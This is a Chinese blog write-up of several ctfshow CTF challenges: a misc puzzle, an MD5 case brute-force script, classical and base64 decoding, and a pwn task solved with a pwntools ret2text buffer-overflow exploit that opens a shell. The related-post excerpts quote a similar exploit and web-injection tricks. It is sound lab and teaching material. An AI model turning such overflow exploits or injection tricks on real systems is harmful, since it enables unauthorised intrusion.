ctfshow单身杯(dsb)个人wp

最新推荐文章于 2022-12-29 19:55:19 发布
最新推荐文章于 2022-12-29 19:55:19 发布
阅读量938 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49436541/article/details/124902952
版权

目录

MISC签到

wp直接都写在题目描述里面了
先进行一个破的爆
在这里插入图片描述
右键记事本打开发现base64编码
在这里插入图片描述
解码得到半个二维码
在这里插入图片描述
zsteg得到半个flag
在这里插入图片描述
最后将二维码反色后补全就能得到另一半flag,按照格式改好提交就行

没大没小的串串

import hashlib
import random
def huan(zm):
    if ord(zm)>=65 and ord(zm)<=90:
        return zm.lower()
    if ord(zm)>=97 and ord(zm)<=122:
        return zm.upper()
    return zm
flag="y0U_RE4lLy_kn0W_TH1S_ConGr4tUlAT10Ns"
while 1:
    flag1=''
    for i in range(len(flag)):
        a=random.randint(0,1)
        if a==1:
            flag1+=huan(flag[i])
        if a==0:
            flag1+=flag[i]
    b=hashlib.md5(flag1.encode(encoding='utf-8'))
    if str(b.hexdigest())=='7513209051f455fa44d0fa5cd0f3e051':
        print(flag1)
        print(b.hexdigest())
        break

古典base

在这里插入图片描述
得到奇怪的东西,栅栏+base64就出来了
在这里插入图片描述
在这里插入图片描述

re签到

右键记事本打开,这一坨复制下来
在这里插入图片描述

三次base64
在这里插入图片描述

pwn签到

gets无限溢出
在这里插入图片描述
白给后门
在这里插入图片描述
一般的ret2text

from pwn import * 
elf=ELF("./pwn01")
io=process('./pwn01')
#io=remote('pwn.challenge.ctf.show',28111)
shell=0x80484F6
payload=(b'a'*0x10)+(b'a'*4)+p32(shell)
sleep(0.1)
io.sendline(payload)
io.interactive()
久而不念
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFShow-WEB(签到题~5) WP
PP Jun的博客
08-01 898
ctfshow单身部分wp
m0_62422842的博客
07-09 969
php伪协议,sed命令和awk命令的用法与应用。SSTI的绕过
CTFshow单身 部分wp
Nancy523的博客
05-22 1990
前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录1、单身热身题目2、misc签到3、没大没小的串串4、任性老板5、蛤壳雪茄-16、蛤壳雪茄-27、The Dancing Men8、伪装成RSA的MUSC9、re签到10、magic 1、单身热身题目 应该是后台做了日期相关的验证,反正照常输一个日期不要太离谱的就哦了 2、misc签到 题目提示: 下载附件,ARCHPR爆破所有可打印字符,位数为5位,得到压缩包密码61f@X 010editor打开解压得到的图片可以找到 base6.
ctfshow单身
Landasika的博客
05-25 1270
ctfshow单身 web1. web签到 题目代码如下: <?php # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-03-19 12:10:55 # @Last Modified by: h1xa # @Last Modified time: 2022-03-19 13:27:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com error_reporting(0);
单身Webweb签到
Pai_Space
07-15 791
单身Webweb签到
DSB_carrier_MATLABDSB_
10-04
在AM信号中,载波分量并不携带信息,仍占据大部分功率,如果抑制载波分量的发送,就能够提高功率效率,这就抑制载波双边带调制DSB-SC(Double Side Band with Suppressed Carrier),简称双边带调制(DSB)。
DSB调制解调(matlab)
05-04
用MATLAB对DSB的调制解调进行仿真模拟,包括时域,频域,加噪,包络。 (MATLAB for DSB modulation and demodulation simulation, including time domain, frequency domain, noise, envelope.) 文件列表: DSB调制...
dsb.rar_dsb
09-21
dsb modulation with matlab
DSB.rar_dsb
09-21
实现在c51020单片机上100k的正弦波对10k正弦波的调制
DSB.zip_dsp dsb
09-24
用vc写的DSB调制演示演示程序,这可是在国内不多见!可以看到调制的整个过程。对大学学习如何在VC下进行通信编程有指导意义!
[ctfshow 单身]web writeup&&学习一下sed awk基本用法
weixin_45751765的博客
06-08 1053
想起来之前比赛撞了 单身没打完 刚好来复现一下 data伪协议直接过 ?>截断就行poc 远程包含用?参数包含也可 三字长度命令 参数长度任意保证传入字符串参考 sed教程 流程:sed工作流程 sed不用任何语句时可以直接输出源文件内容 本着需要什么学什么的初心 我们直接看payload来学习 sed支持正则匹配 /esca/匹配到 escape行 d 将其删除 sed语句用;间隔开 s字符串替换 shell_exec -> system g为全局替换标志w 写入 -->可以看作cp的功能版 将
ctfshow | 单身dsb | pwn | pwn签到
Dem1的博客
05-22 277
from pwn import * p = remote('pwn.challenge.ctf.show',28018) #p =process('./pwn01') shell_here = 0x80484f6 payload = 'a'*(0x10+0x4) + p32(shell_here) p.sendline(payload) p.interactive()
ctfshow七夕web签到wp
arcuied
12-29 292
ctfshow七夕web签到wp
ctfshow单身狗 -- web
cainsoftware的博客
07-21 526
看到入参file判断项是strrev(反转)==正常入参刚开始考虑过弱等于绕过,但是include没啥用,后来了解到2个知识点,,1.第一可以利用data//伪协议,2.php?>后的内容不再进行运算所以可以构造如下file=data?>通过py反转构造完整payload签到题这么难?签到题不应该是有手就行的那种吗。...
ctfshow | 单身dsb | pwn | ctfshow_OA
Dem1的博客
05-22 345
#create user&password -> login -> validate psn session -> from pwn import * p = remote("pwn.challenge.ctf.show",28156) #-----main -> menu #-----from main #-----create_new_user p.sendline('1') p.recvuntil('username :') p.sendline('pwn')#
【ctfshow单身 TooYoungRSA】
chuxuezhewocao的博客
05-28 290
前言 ctfshow —单身 TooYoungRSA 一、题目分析 nc之后题目给出了个随机数(小于n)加密后的值ck,以及ck经过sha256之后的hex编码(key),后面用到这个key对flag进行AES加密,AES加密部分很好处理,但是关键在于不知道前面RSA加密部分的n和e。根据源码后面我们知道了,我们可以一直输入内容,然后函数返回相同的n和e加密后的值,这里我们可以进行选择明文攻击,得到n和e。 二、公式推导 由题知: k ^ e ≡ c1(mod n) 此时假设我们再输入k^2,得到: (k
ctfshow大部分wp(附带个人整理知识笔记)
ZxC789456302的博客
10-01 6752
WEB信息搜集入门(前10道都是水题,10题后没有水题了)源码中即为flag(签到题)前端js拦截,查看源代码即可,得到flagflag在响应头里面在访问robots.txt,得知存在flagishere.txt文件,访问获得flagphps源码泄露,访问index.phps,下载文件打开得到flag访问www.zip获取配置文件得知在服务器下存在fl000g.txt,线上访问得到flag访问.git(隐藏文件)注意格式为/.git/,得到flag隐藏文件的第二种情况,访问.svn,格式为/.svn/,得到
ctfshow 单身(dsb)
qq_29634299的博客
05-22 1115
OSINT 任性老板 用yandex识图搜到虎扑的关于这个点的信息 https://bbs.hupu.com/27645621.html 通过恢复知道这个店铺的名字叫左撇子私房面 通过百度搜索店面即可获得电话号码 蛤壳雪茄-1 谷歌识图找到原图 知道它是mary river aerodrome这个 搜索得到 搜索这第一个公司的名字即可得到公司网站得到flag re re签到 拖到 IDA中 f5反汇编,看到 if ( !strcmp(v5, "V2toT2FWZ3pTbXhZTTA1d1dqSTFabU
matlab dsb
最新发布
11-14
根据提供的引用内容,DSB是一种调制方式,即双边带调制。在MATLAB中,可以使用dsbmod函数进行DSB调制,使用dsbdemod函数进行解调。下面是一个简单的例子: ```matlab % 生成调制信号 fc = 1000; % 载波频率 fs = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值